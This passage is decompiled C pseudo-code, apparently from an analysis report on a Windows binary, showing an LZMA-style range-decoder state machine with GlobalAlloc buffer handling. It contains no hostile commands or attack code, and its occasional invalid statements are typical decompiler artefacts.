								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M00406BD6))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
